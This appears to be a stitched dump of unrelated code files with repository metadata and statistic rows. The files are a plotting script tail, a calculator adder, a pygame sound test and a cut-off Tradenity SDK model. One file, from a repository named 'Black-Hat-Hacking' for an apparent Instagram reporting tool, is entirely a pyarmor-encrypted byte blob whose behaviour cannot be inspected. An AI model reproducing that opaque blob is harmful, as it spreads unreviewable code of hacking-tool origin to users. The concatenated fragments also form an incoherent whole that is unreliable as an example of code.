ax.boxplot(result_solver_cnt_infeasable.values(), notch=False, showfliers=False)
ax.plot(datax, datay, color="black", marker='o', linestyle=":", linewidth=2)
plt.show()
exit(1)
| 45.793333 | 137 | 0.552773 | 2,341 | 20,607 | 4.584793 | 0.101239 | 0.056648 | 0.092239 | 0.079195 | 0.827355 | 0.79987 | 0.786173 | 0.771453 | 0.717227 | 0.706606 | 0 | 0.020739 | 0.333139 | 20,607 | 449 | 138 | 45.895323 | 0.760297 | 0.041879 | 0 | 0.728045 | 0 | 0 | 0.083789 | 0.042655 | 0 | 0 | 0 | 0 | 0 | 1 | 0.002833 | false | 0 | 0.028329 | 0 | 0.031161 | 0.056657 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f10948ba7cd2752403cd493f6e8543a493065e5a | 12,107 | py | Python | libs/M4nifest0.py | M4nifest0-Black-Hat-Hacking/M4nifest0_IG_ReportV4 | dcd3258dfabeaee8424215ec56e013a369781ca0 | [
"MIT"
] | 14 | 2021-12-22T16:38:44.000Z | 2022-03-01T16:49:33.000Z | libs/M4nifest0.py | M4nifest0-Black-Hat-Hacking/M4nifest0_IG_ReportV4 | dcd3258dfabeaee8424215ec56e013a369781ca0 | [
"MIT"
] | 1 | 2021-12-24T10:41:10.000Z | 2022-01-05T05:03:37.000Z | libs/M4nifest0.py | M4nifest0-Black-Hat-Hacking/M4nifest0_IG_ReportV4 | dcd3258dfabeaee8424215ec56e013a369781ca0 | [
"MIT"
] | 6 | 2021-12-22T16:34:54.000Z | 2022-01-27T19:58:26.000Z | from pytransform import pyarmor_runtime
pyarmor_runtime()
__pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x09\x00\x61\x0d\x0d\x0a\x09\x2e\xa0\x01\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x7a\x0b\x00\x00\x00\x00\x00\x18\xbe\x83\x3c\x91\xaf\xa0\xba\xcd\xc3\x74\x08\xe9\x11\x7d\xec\x75\x00\x00\x00\x00\x00\x00\x00\x00\x30\x09\xef\xe7\xaf\xc8\xd4\x0f\x2d\x94\x95\x0d\x28\x80\xbc\x9c\x4b\x72\x14\xd3\x6d\x71\x8b\x86\xa7\xf0\xa3\x90\xf2\x3a\x5d\xa6\xf5\x9d\x1f\xf3\x57\xfe\xec\x4f\xe4\xa0\xe7\x14\x2a\x6b\x8e\x2a\xde\x89\x52\x6a\xc4\xd7\x53\xbf\xa4\x59\xa8\xe4\x74\x32\x26\xaf\x3c\x34\x1c\x5c\x4b\xd7\xdd\x78\x43\x40\x89\xdd\xe6\xef\xfa\xf2\x25\x21\xee\x4d\x1f\x82\xcc\xc5\x77\x81\xc5\x99\xbe\xd7\x2d\x0b\x72\xe4\x3c\x97\x67\x54\xae\xc0\xd2\x78\xa8\xe1\x7d\x3e\x61\xca\x2f\x4d\xdc\x0e\x4a\xc5\x00\x17\x96\xb3\xc5\x19\x04\x78\x31\x2f\xf6\xc3\x47\xd9\xab\x71\xa5\x6d\x32\x65\x20\x5a\x85\xd4\xe4\x79\x63\xdc\x83\x06\x59\x96\x14\x29\xd9\xbc\x4e\xaf\x64\xed\x65\x74\x7d\xac\xb0\x97\x60\x30\xa1\x14\x4f\x31\x28\xbd\x13\xd8\x83\x88\x48\xee\xc2\xfa\x56\x3c\xc7\x63\x11\xd7\x50\x8d\x8e\x5c\xc7\xdc\x5a\xea\xf8\x5a\x43\xad\xa4\x99\x73\x4c\xa7\x0c\x1f\x73\x93\x57\xe0\x29\xa1\x5a\xae\xaa\x85\x13\x9a\x1a\x4a\x57\x26\x3a\x26\xf5\x26\x70\x9d\xfb\x4c\xd7\x6e\x93\x81\x22\xd6\xc7\x8c\x4a\x9b\x71\x63\xc5\xc5\xf7\x95\x9c\xf1\x11\x15\xee\x34\xd8\xc5\x20\x7a\x94\xf6\x26\xa7\x48\x75\x7d\xbe\xce\xb9\xed\x56\x74\xc5\x48\x16\x75\xed\xcb\xdd\x9d\x3e\x49\xa8\x40\x86\xbf\x59\xc2\xed\x76\x45\xe1\x98\x5a\x0f\x80\x24\xe4\xf3\xb7\xa7\x80\x56\x3a\xb6\xae\x39\xa5\xa8\x4c\x87\xa2\x62\xed\x91\x5b\xfd\xf3\x01\xdd\x8a\x08\x53\x93\x1f\xb5\x7a\xf6\x9b\xf9\xef\x99\x4b\x8c\x59\x98\x41\x47\x6c\xc7\x0f\x25\xef\x8a\xd3\x17\x24\x94\x8d\xc4\x88\x3a\xe0\x4c\xa2\x74\x48\xd6\x27\xd6\x39\x89\x36\x1b\xc0\xc7\x65\xb1\x34\xb2\x5b\x1e\xd8\x3b\x1d\xb0\x0f\xa9\x99\xaa\x93\x1d\x94\xdb\xf4\x5e\x8e\x12\x23\xa0\xad\x57\x57\x13\x7b\xce\xdd\xd6\xe3\xeb\xe2\xe8\xcb\x7e\x06\xc8\x89\xf4\xae\xb3\x66\xf7\xec\xbc\x58\x31\xa4\x2f\xa3\xda\xa2\x67\xc3\x2b\x1a\x12\x66\x36\xcf\x46\xd1\x47\x4a\xb2\xff\x95\xe9\x94\x09\x11\x7d\x42\xd3\x25\x74\xa6\xc2\x80\x7d\xba\x84\x43\x21\xa5\x9c\x91\xe7\x12\x09\x80\x8d\x67\xcc\x44\x03\x69\x2f\x8a\xaa\x56\x81\xbd\x7b\xe0\xb8\xb0\xd0\x39\x26\xeb\x2a\xe1\x7b\xa1\x3d\xda\x17\x97\xd4\x3a\xa9\x08\x90\xc6\xc3\x05\xe2\x77\x87\x44\x66\x69\x0b\x76\x5a\xfc\x7d\xac\xd6\xda\x77\x04\x1a\xb6\xa0\x68\x7a\x99\xe0\x38\x25\xee\x08\x27\xad\x27\x66\xad\x0c\xa7\x5a\xe2\xe2\x8f\x62\xa9\x7f\x6b\xc2\x6a\xa1\x1e\xf1\x5f\xce\x67\x6b\x5f\x00\xc5\xd1\xa9\xc3\x26\xe1\x44\x3f\x09\x26\x5e\x1d\xbc\x70\x9a\x34\x63\xb7\xa3\x91\x38\x9d\xd6\x81\x66\xa9\x69\x86\xf4\x27\x15\x0f\x73\xc3\xbe\x44\x49\x28\xca\x74\x98\x07\xd5\xe3\xd1\xe1\xed\xd8\xfa\xb6\xd7\xd6\xd2\xfe\xf5\xa2\x44\x0c\xa9\x3d\x8c\x8f\x76\xde\x52\x47\xfe\xfb\x39\xd9\xf4\x34\x19\x89\x25\xc6\x74\xd7\x03\x41\xfe\x2a\x98\xfd\xf1\x3c\xc5\x6c\xaf\x60\x64\x96\xe7\x00\xfe\xe3\xbf\xd5\xc4\x30\x9b\x1f\xc1\xe4\x35\xb6\xe9\xca\x32\x3e\x79\xd5\xe3\x72\x62\x6a\x12\x9e\x15\xd4\x9f\x73\x7e\xd4\x85\xb4\x9f\xfe\xb2\x34\x42\xdf\x8d\x6c\xdd\x4e\x0c\xf0\xd5\x01\x0b\xcc\x29\xa2\xd1\xe5\x1e\x17\x1b\xdd\xb3\x9d\x52\xfb\xf6\xf1\x94\x25\x73\xb8\x93\xe0\x34\x6d\xcb\xc4\x8f\x12\x96\x97\x47\xa9\x61\xaa\xef\xcf\x3d\xb0\xbb\xdb\xda\x85\x0e\xe1\xd7\xc6\x8e\xe3\xe7\xd2\x64\x04\x30\xc6\x5c\x42\xa3\x2e\xe7\xa0\xbb\xdb\x1a\x13\xb0\x43\x16\x44\x71\xfc\x42\x2f\x9c\xa9\xab\x00\xc7\x53\x17\x0d\x06\x3f\x42\x00\x10\x99\x49\x3c\x3d\x7f\x3f\xf4\xb8\xc3\xea\x3a\xe6\x82\x03\xac\x11\x18\xe7\xe1\x1f\x8d\xe0\x7b\x8d\x4e\x9f\xd8\x6c\x0d\xc0\x62\x53\x30\xd1\xb6\xf6\xb6\x92\x0b\xdc\xba\x14\xb8\xbc\x89\xba\x6f\x60\xe3\x0b\xbc\x64\x78\xa5\x35\x02\x9d\x83\x62\x7e\x20\xf8\xc7\x5f\x17\x5c\xb1\x4a\x8b\xac\x7e\x3d\xf8\xbf\x5d\x82\x7c\x78\x29\x6b\x46\x68\x35\xf9\x10\x6f\x39\x66\x8a\xda\x6d\xa2\xd7\x1d\xb6\xf1\xa3\x2f\x36\xbc\xa1\xb4\x2e\x23\xa3\x49\xe1\x71\x32\x5d\x63\x06\x6e\x81\x25\xa8\x6f\xba\xb0\x35\x63\x4a\xfb\x9a\x6e\x5e\xb3\x2b\x2a\x71\xdf\x34\xdc\x7a\xaf\x67\x58\x0c\xc9\x35\x49\x45\xdc\x07\xcf\xfc\xda\x1f\x88\x28\x9f\xec\xf1\x43\x81\x53\xe1\x03\x0e\x93\x44\x8b\xdf\x5f\x6a\x18\xad\x6c\x35\xd0\xd5\xbe\x43\x7a\x5a\xc5\xf3\xef\x42\xaf\xf1\x0b\x14\x66\x86\x96\x69\xa8\x20\x69\x56\xb1\x9e\x84\xdf\x95\xb0\x84\x1b\xbe\xf8\x38\x8a\x5d\x9d\x05\x94\x5e\x6f\x74\x87\x36\x4b\x90\xfb\x59\x96\xc1\x79\x99\x06\xc0\x2f\x92\xe2\xff\x3f\xe5\x76\x70\x3b\xaf\x39\xc0\x21\x75\x75\xe6\x54\x86\xb4\xce\x25\xd7\x9b\x5a\xed\x6a\x32\xeb\x59\x47\xfa\x59\x09\xbb\xe6\x25\xb7\xb7\x38\xe9\xd3\x72\x5e\x6b\xc7\x11\x6b\x53\x82\xb8\xd9\xa0\xaf\x0c\x60\xad\xa3\x58\x98\xb1\xd8\xe7\x10\x84\xca\xa2\x4a\xed\x05\xc4\x5f\x9a\x5f\xe5\xc6\x0e\x32\x37\xca\x2c\xfc\xc5\x5f\x7f\xf3\x99\x81\x5d\xd3\x57\x90\xcd\xb5\xb8\xd9\xa7\x64\x46\x6c\x5f\xbc\xfb\xa3\x4e\x59\xb6\x6e\x7b\x96\x70\x7f\xe3\xc6\x19\x1a\xe8\x02\xca\xeb\x17\xfc\xfb\x59\xa4\x71\x1e\x85\x8b\xee\xc6\x81\xcc\xe8\xee\x51\xbe\x98\x61\x0c\xec\x89\x45\xe0\x89\x23\x56\xe1\x67\xd1\xa9\xb0\x8d\x3e\x46\xf0\xa8\xa5\x95\x8b\x29\x41\xcd\x1d\x40\x37\x4c\x17\x14\x1a\xc1\x2f\x27\xfe\x3e\x8a\x9a\xa0\xf2\x7b\xde\x31\xb1\x21\xbe\x9a\x8d\xea\x60\x0b\xbd\x4b\x59\x9e\x0c\x2d\x51\x91\xfb\x2a\x16\x16\x59\x1b\x16\x90\xd2\x07\xae\xb2\x63\x64\xee\xb7\x14\x67\xe5\x07\x96\xdd\xfb\x67\xb6\xcd\xda\x9e\xe9\x7e\xcb\xe1\xff\xf1\x84\x07\x1b\xf1\xc1\x9c\xa5\x49\x21\xb9\xb7\x30\xc4\x57\xea\x5f\x4c\x10\x3b\x04\x48\x3d\x3c\x66\x74\xde\xed\xcc\x03\x27\x18\x1b\x08\x62\x8e\x07\xbb\xdc\x38\xd6\x57\xc6\xaf\xcd\x63\x4d\x8d\xb8\x5b\x17\x0a\xe1\xe4\x52\x81\x03\xd8\x2a\x6b\x79\xe3\x37\x12\x22\xb7\x27\x1d\xf0\x21\x33\x3d\xe4\x75\xc5\x88\xd2\xbc\x3f\xea\x94\xd2\x36\x14\xce\xa1\x7b\x96\xf9\xea\x3e\x40\xce\xd8\x61\x6a\x2d\x27\x4e\xe9\xd1\x5b\x6c\x6c\xae\x3e\x06\x7c\xf4\xe8\x70\x86\xa6\xb8\xe4\x3f\xe9\x99\x51\x2e\xfd\x6f\x35\x9d\x79\xd7\xae\x4b\xb5\x74\x78\xfb\x99\x4b\x45\x45\x62\xac\xae\x92\x6f\xca\xfa\x4e\x28\x3b\x2f\xb7\x8b\x4e\x91\x58\xe0\x60\x9e\xd2\x63\x9a\x62\x59\xc3\x8e\xe7\xfb\x2b\xb1\x44\xf8\x46\xa7\x68\xdf\x06\x44\x81\x8d\x7f\x01\x23\xee\x2c\x11\x10\xa9\xa4\x93\xf7\x78\x03\x34\x66\x84\x4a\x7b\xfc\x5e\xb6\x58\xe2\x28\xd6\x9d\xf6\xc7\xd4\x4d\x33\xd2\xfd\xe2\x10\x1a\x32\x70\xec\xc3\x77\xc4\xcf\x3a\x2c\x14\x86\x43\x6e\xcd\x96\xa6\x91\xc7\x45\xec\x02\x07\xae\x6b\x35\x23\x29\x1d\xa1\xc4\x8b\x75\x77\xce\xde\xf4\xc4\xcf\xdb\x81\x94\x11\xef\x50\x4d\x9b\xcb\xa7\x75\xa3\x62\x7f\xc6\x9e\x5d\x5d\x16\x04\x4f\x3d\x8e\xc6\xb7\xc6\xeb\x72\x68\x79\x8d\x38\x0a\x02\x0c\x4b\xda\x8b\xc1\x76\xbf\x51\x90\x6e\xeb\xf2\x74\x7c\xa8\x5d\x68\x79\xb8\x2e\xcc\x0b\x92\x80\x9a\x8c\xff\xb3\xaf\x72\x2f\x49\x24\xbd\xce\xe7\x52\x54\x33\xc2\xae\x4e\xc6\x1e\x53\x0c\x72\x54\x6c\xdc\x5e\xf7\x1f\xee\x51\xf1\x54\xe1\x12\xda\x1e\xc4\x63\x7d\xed\x63\xea\x4e\xab\xc1\xf3\x04\xc1\x13\x6d\xed\x84\xa6\xb5\xff\x99\x89\xea\xf5\xd3\xda\x65\x50\x76\x9e\xc1\x4b\x2a\x2e\x59\x08\xe8\xc4\xf1\xa2\xf4\x26\x02\x1b\x1c\x83\x7a\x3b\xbf\x12\x7e\xa7\x70\x08\x4e\x23\xa7\x1d\xbf\xf8\xf5\xcc\xae\x05\x56\x73\xc6\x65\x74\xb2\x84\x24\x0d\x83\xc7\x8f\xe7\x07\x3f\xb0\x05\x5b\x49\x0c\x25\x99\x48\x02\xaa\xf7\xc8\x50\x6a\x3a\x79\x76\x98\xf5\xa2\xe3\xe5\xe1\xef\x00\xd7\x0c\x2f\xe3\xf7\x4e\xc0\xcc\x6a\x35\x49\x9f\xff\xbd\xd7\x47\xff\xe8\x7c\xe7\x1d\x83\xf6\x04\x91\xaf\xa1\x8e\x11\xa0\x8d\xec\x87\xde\xbb\x4e\xbe\xab\x3c\x82\x8f\xcf\x42\x99\x5a\x0e\x26\x0c\xab\x90\x95\x2f\x32\x4c\xcc\x58\x49\x95\xa3\x36\xbf\x04\x30\xfb\x44\xa0\xce\x4a\x96\xcf\x73\x11\x86\x38\x12\x35\x28\x25\xf5\xf3\x29\x7e\xfa\x75\xe6\x35\x12\x2b\xc4\x58\xfb\x5d\x65\xda\xfd\x28\x73\xe1\x46\x95\x92\x4e\x72\xf6\x2e\x96\xbb\xf6\xac\x17\xa2\x04\xc9\xea\x51\x40\x2e\xe9\x88\xfc\xf0\x7f\x3e\x60\x0b\xab\x4a\x2d\xe5\x04\x17\xba\xd6\x91\xa7\xa2\xed\xa7\x19\xc5\x45\x8d\xa9\xaf\xa9\x8d\x2a\x3a\x67\x55\xdb\xad\x61\x87\x6c\x3f\xdf\xbe\x97\xe6\xdf\x50\x19\x2f\x49\x96\xa4\x04\x65\xa7\x22\xeb\x30\xfe\xf2\xd1\x9b\x71\xa6\x11\x39\x72\x29\xc7\xd0\x20\x35\xa5\x10\x4f\x77\xa2\xc5\xe3\x9c\x51\xa8\x4e\xfd\x18\x2a\xce\xca\xde\x60\x07\x13\xe7\xbf\xb0\x17\xbd\xce\xb6\xd9\x6d\x9f\x6c\x5a\x6e\xe8\x1e\x6f\x26\x18\x18\xda\xe4\x9b\xcf\xe7\x19\x6f\x5e\xe4\xee\x2d\x37\x48\x8e\x3d\x1e\xd8\xfe\x8e\x7f\xe8\x1d\x89\xd9\x04\x44\x48\x59\x3d\x0a\x82\xeb\x59\xd6\xb3\x7e\xd7\x74\xeb\x57\x8d\xe3\x73\xcb\x49\x07\x2e\x1b\x7b\xa0\x2e\x05\xb4\x6a\x1f\x58\x13\x3f\x8b\x56\x6f\x77\xc5\xa1\x66\x6c\xc4\x9e\x57\xb6\xb7\x9a\xb4\x72\xc5\x04\x16\x11\xcd\xcc\x1a\x7e\x80\x62\xd3\xce\xd4\x01\x63\xb5\x5f\xff\xd6\x36\x96\xcb\x2c\xbf\x94\x71\x98\x05\x17\x5b\xb5\x0a\x73\xc4\xbd\x99\x18\x3a\x30\xac\x64\x68\x6f\x01\x34\x1a\x00\x7c\xe0\x12\xdd\x92\x47\xad\x4c\x64\xf5\x9a\x71\xbd\x69\x39\xed\x21\x61\xce\xa8\x6c\x5a\xab\xe0\xb1\xac\x78\x6b\x9e\x50\x92\xcd\xbd\x0b\x13\xaa\x65\x71\x12\xd1\x44\x45\xd8\x03\xa7\x7c\x59\x22\xcf\x81\x4a\x3b\x94\xb0\xd5\x88\x74\x42\xdc\x5b\x96\x3e\xe8\xc0\x70\xab\x5c\x28\xcc\x2c\xcb\x84\xbf\xcf\x51\xee\x17\x59\x4e\x4a\xac\x65\x64\x88\x2f\xc6\x2c\x24\x93\x71\x98\x09\x1b\x62\xb7\xe0\x4a\x15\xb8\x5e\x79\xc9\xdd\x59\xb0\x34\x4f\x7d\xd7\xb0\xea\x4c\x88\x38\x33\x32\x9d\xaf\xc3\x3e\x11\x84\x96\x77\x0d\x48\x02\x0c\x03\x99\xe5\x6e\x65\x57\xe7\x71\xac\x5f\x5c\xf7\x8a\xe4\x2e\x05\xc8\xb6\x96\xad\x2c\x1f\xd2\x1f\x5d\xfe\x5d\x66\x0e\x38\x43\xf0\x8b\x45\x89\x9e\xb0\x22\xc3\x89\x71\x92\xa3\x5d\x73\xae\xe5\x19\x37\x59\xdf\x89\x2e\x6b\xe4\x8e\x8a\x8f\x12\x06\xd1\x72\x12\xb6\x51\x67\xe4\x44\x11\xc2\xbb\x93\xa2\x2f\xea\x07\x84\x79\xa2\xcb\xa1\x75\x54\x66\xed\x71\xf0\xd0\xf9\x5e\xa0\x4c\x4d\x4f\x33\xcc\x7f\x59\xf7\xfc\xbc\x49\xec\x49\xe4\xa4\xb0\x4f\x12\x01\x9b\x47\x41\x9a\x46\xbc\x45\xa3\xd9\xa4\xd5\x6d\x24\x51\xd8\xff\x41\x46\xa8\x0f\xae\xe2\x10\x68\x69\xa5\xbf\xb2\x8c\xbe\xf9\xc7\xb2\xfe\x1b\x0b\x80\xde\xb5\xa7\x90\xbf\x1a\xe2\x94\x74\x74\xff\x37\x52\x0d\x65\x00\x39\x04\x40\xd9\x01\x76\x57\xa6\xd8\xbb\xdb\x95\x98\xb7\x62\x79\x6f\x6c\x2f\x14\xe4\xe9\x97\xfc\x81\xdf\x42\x3c\xda\xcd\x09\x95\x40\xd2\x1b\x64\xa1\x72\x4d\x20\x9a\xa2\xcb\xce\xaa\x0f\x19\x97\xfd\x48\x95\xd5\x1f\x0e\xd9\xbc\x79\xc1\x8d\x57\x47\xec\x79\x6d\x28\x2a\xba\xba\xf4\x91\x96\xc8\x1e\x87\x72\x2c\x27\x00\xfc\x8a\xac\x1b\x10\xf8\xdb\x64\x5a\xb8\x70\xec\xdc\x92\xda\x2c\x86\x90\x1d\xf3\x94\xeb\xd8\x70\x21\x36\x1e\x79\xed\xd8\x87\x99\x54\x17\xa9\x4f\x30\x38\xb4\xb6\x01\x6d\x43\xfc\x3e\xd1\x5a\xe1\x5b\xc5\x23\x38\xaf\x98\x1b\x54\x51\x88\xb7\x10\xc3\x58\x19\x52\xaf\xb0\x35\x2b\x40\x91\x92\xb3\x5d\x48\x01\x71\xbd\x4f\x0a\xea\x87\x7e\x60\xce\x1d\xd0\xfa\x74\x8a\x8c\x22\x97\x3e\x63\x8e\x83\x1a\x3d\x21\xf6\xc8\x92\xfa\x6f\x43\xa9\x5f\xd1\x1f\x73\xff\x4a\x35\x14\x14\x8e\x3e\xe7\x9b\x0b\xa2\xa7\x70\x72\xa0\xac\xeb\xb8\x49\xa8\xbe\x3d\x65\xf8\x4a\x88\x2a\x06\x75\x5f\x87\x87\x85\x90\x43\x7e\x84\xc8\x5d\x1d\x40\x1a\x18\x88\xef\xbd\x3e\xe1\xc0\x92\xd2\x3c\xa8\x44\x48\x74\xa9\x17\x6f\xd7\xc5\x60\x95\xe8\x74\x2e\xd8\x73\x4d\x48\x02\xb0\x2e\x71\x52\x3a\x7f\x5b\xd1\xfc\x6c\x0b\x2d\x6e\xe3\xad\xe3\xeb\xa1\x8d\x95\xa9\x2f\xac\x24\x1d\x10\x4d\x5f\xfd\x89\xf1\xe8\x06\x7f\x60\x96\x81\x48\x59\x07\x8e\x99\xfa\xe9\xd4\xbd\x7b\xff\xc0\x3d\x51\xd0\xae\x17\xb3\x9a\xd3\x3b\x92\xc1\x1d\x8f\x51\xe3\x6d\x78\x60\xb8\xcb\xf1\x26\xb6\x3f\x63\x8c\xd6\xb8\xec\xa9\xaf\x45\x23\xde\xf0\x86\x03\x8c\x91\xb9\x08\x95\xca\x70\xc3\x06\x7c\x1f\x12\x1a\xb8\xab\xba\xc3\xaf\x0c\x9b\x77\x22\xc0\x95\x79\xbb\xbc\x1b\x0f\x87\x90\x23\x3c\x2b\x08\x2a\x02\xac\xb1\x9d\x55\xfb\x3a\x44\xa2\x08\x6f\x5e\xa5\x61\x1d\x78\x06\xdb\x22\x6c\xdd\x92\xef\xb1\xeb\xb4\xf7\x55\x52\x4c\x25\xe1\xb7\x5c\xbc\xa7\xcf\x5d\xb5\x50\x4d\xe3\xc3\xd2\xc5\x46\xfb\xb1\x35\x3f\x32\x24\x5f\x42\x7d\xf6\xc9\x48\x4f\x66\xd9\xdb\xd0\xb8\x21\x2b\xc8\xf4\x3a\x23\x8f\x20\x34\xdc\x9f\x1a\x82\x34\xdf\x2b\x5c\x6b\xd4\x02\xb4\x69\x28\xd4\x86\xd8\x15\x24\x30\xf7\x14\x2e\x25\x92\x74\x91\xce\xde\xfa\x74\xbc\x90\x83\x69\xe0\xc8\x56\xbe\x87\xe3\x41\x1e\x50\x99\x2f\x23\xf3\xc4\x63\xba\xd6\xb6\x99\x48\x76\x0f\xdc\x1e\xaa\x3e\xd1\x9f\x68\xab\xaa\x43\xc3\xfc\x43\x6b\xe2\xf3\x30\x76\x9e\x77\x2f\x87\x3c\x67\x19\x65\xa5\x05\xcc\xcf\x13\x33\x96\x54\xab\x18\x5a\x59\xc2\x05\xbf\x5c\x53\x6d\x6a\x64\x49\x95\x0e\x2f\xc8\x69\x4d\x01\x44\x2b\x84\xc7\xf2\x2d\xc9\x49\x38\x80\x9c\x52\x37\xbe\xda\x78\x39\x1f\xfa\x3e\x86\x83\xb4\x5c\x29\xde\x95\xf3\x8d\xaa\x09\xe8\x42\x92\x68\x91\x91\xea\xcd\x83\xe8\xe7\x2f\x3e\x93\x6f\x1e\x6a\xc6\x82\x48\x5c\x19\x97\xef\x9f\x19\x59\x81\xb5\x65\xe3\x58\xf1\xd9', 2) | 4,035.666667 | 12,047 | 0.750475 | 3,014 | 12,107 | 3.009954 | 0.087923 | 0.012566 | 0.012897 | 0.010582 | 0.004299 | 0.002646 | 0.002646 | 0 | 0 | 0 | 0 | 0.310077 | 0.000826 | 12,107 | 3 | 12,047 | 4,035.666667 | 0.439861 | 0 | 0 | 0 | 0 | 0.333333 | 0.991905 | 0.991905 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 11 |
f16be9e085b5f727674c1b77b78d0f4579ef9123 | 159 | py | Python | src/py220_supplemental/lessons/lesson01/activity/calculator/adder.py | UWPCE-Python-Course-2-Materials/supplementary_files | d3155b09a92d9660099da0f331663f472a9289eb | [
"MIT"
] | 10 | 2020-06-28T05:38:32.000Z | 2022-01-27T13:48:51.000Z | src/py220_supplemental/lessons/lesson01/activity/calculator/adder.py | UWPCE-Python-Course-2-Materials/supplementary_files | d3155b09a92d9660099da0f331663f472a9289eb | [
"MIT"
] | null | null | null | src/py220_supplemental/lessons/lesson01/activity/calculator/adder.py | UWPCE-Python-Course-2-Materials/supplementary_files | d3155b09a92d9660099da0f331663f472a9289eb | [
"MIT"
] | 5 | 2020-09-24T20:14:36.000Z | 2021-11-07T22:47:23.000Z | """ This module provides an addition operator. """
class Adder():
@staticmethod
def calc(operand_1, operand_2):
return operand_1 + operand_2
| 19.875 | 50 | 0.672956 | 20 | 159 | 5.15 | 0.75 | 0.15534 | 0.291262 | 0.31068 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03252 | 0.226415 | 159 | 7 | 51 | 22.714286 | 0.804878 | 0.264151 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
2d41d69e12c9d38495e2c8b843c8e9556566178d | 400 | py | Python | testVideo.py | YanMinge/Physical_Programming_For_Codey | b7220af94a0130b01b1fe17ae9c0f9a3ef727622 | [
"MIT"
] | null | null | null | testVideo.py | YanMinge/Physical_Programming_For_Codey | b7220af94a0130b01b1fe17ae9c0f9a3ef727622 | [
"MIT"
] | null | null | null | testVideo.py | YanMinge/Physical_Programming_For_Codey | b7220af94a0130b01b1fe17ae9c0f9a3ef727622 | [
"MIT"
] | 1 | 2020-01-11T05:49:34.000Z | 2020-01-11T05:49:34.000Z | import pygame
import time
pygame.mixer.init()
pygame.mixer.music.load("/home/pi/project/codey_test/images/CodeDownloadSuc.wav")
pygame.mixer.music.play()
time.sleep(2)
pygame.mixer.music.load("/home/pi/project/codey_test/images/readyWork.wav")
pygame.mixer.music.play()
time.sleep(2)
pygame.mixer.music.load("/home/pi/project/codey_test/images/startWork.wav")
pygame.mixer.music.play()
time.sleep(2) | 30.769231 | 81 | 0.79 | 64 | 400 | 4.890625 | 0.3125 | 0.246006 | 0.306709 | 0.191693 | 0.776358 | 0.776358 | 0.776358 | 0.776358 | 0.670927 | 0.670927 | 0 | 0.007772 | 0.035 | 400 | 13 | 82 | 30.769231 | 0.803109 | 0 | 0 | 0.5 | 0 | 0 | 0.374065 | 0.374065 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
743949564612d26ab0bee048c07de5a98c75cad6 | 28,615 | py | Python | tradenity/resources/option_value.py | tradenity/python-sdk | d13fbe23f4d6ff22554c6d8d2deaf209371adaf1 | [
"Apache-2.0"
] | 1 | 2020-03-19T04:09:17.000Z | 2020-03-19T04:09:17.000Z | tradenity/resources/option_value.py | tradenity/python-sdk | d13fbe23f4d6ff22554c6d8d2deaf209371adaf1 | [
"Apache-2.0"
] | null | null | null | tradenity/resources/option_value.py | tradenity/python-sdk | d13fbe23f4d6ff22554c6d8d2deaf209371adaf1 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Tradenity API
Tradenity eCommerce Rest API
Contact: support@tradenity.com
"""
from __future__ import absolute_import
import re
import pprint
# python 2 and python 3 compatibility library
import six
from tradenity.api_client import ApiClient
class OptionValue(object):
swagger_types = {
'id': 'str',
'meta': 'InstanceMeta',
'option': 'Option',
'value': 'str',
'code': 'str'
}
attribute_map = {
'id': 'id',
'meta': '__meta',
'option': 'option',
'value': 'value',
'code': 'code'
}
api_client = None
def __init__(self, id=None, meta=None, option=None, value=None, code=None):
"""OptionValue - a model defined in Swagger"""
self._id = id
self._meta = None
self._option = None
self._value = None
self._code = None
self.discriminator = None
if meta is not None:
self.meta = meta
self.option = option
self.value = value
self.code = code
@property
def id(self):
if self._id:
return self._id
elif self.meta is None:
return None
else:
self._id = self.meta.href.split("/")[-1]
return self._id
@id.setter
def id(self, new_id):
self._id = new_id
@property
def meta(self):
"""Gets the meta of this OptionValue.
:return: The meta of this OptionValue.
:rtype: InstanceMeta
"""
return self._meta
@meta.setter
def meta(self, meta):
"""Sets the meta of this OptionValue.
:param meta: The meta of this OptionValue.
:type: InstanceMeta
"""
self._meta = meta
@property
def option(self):
"""Gets the option of this OptionValue.
:return: The option of this OptionValue.
:rtype: Option
"""
return self._option
@option.setter
def option(self, option):
"""Sets the option of this OptionValue.
:param option: The option of this OptionValue.
:type: Option
"""
self._option = option
@property
def value(self):
"""Gets the value of this OptionValue.
:return: The value of this OptionValue.
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""Sets the value of this OptionValue.
:param value: The value of this OptionValue.
:type: str
"""
self._value = value
@property
def code(self):
"""Gets the code of this OptionValue.
:return: The code of this OptionValue.
:rtype: str
"""
return self._code
@code.setter
def code(self, code):
"""Sets the code of this OptionValue.
:param code: The code of this OptionValue.
:type: str
"""
self._code = code
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
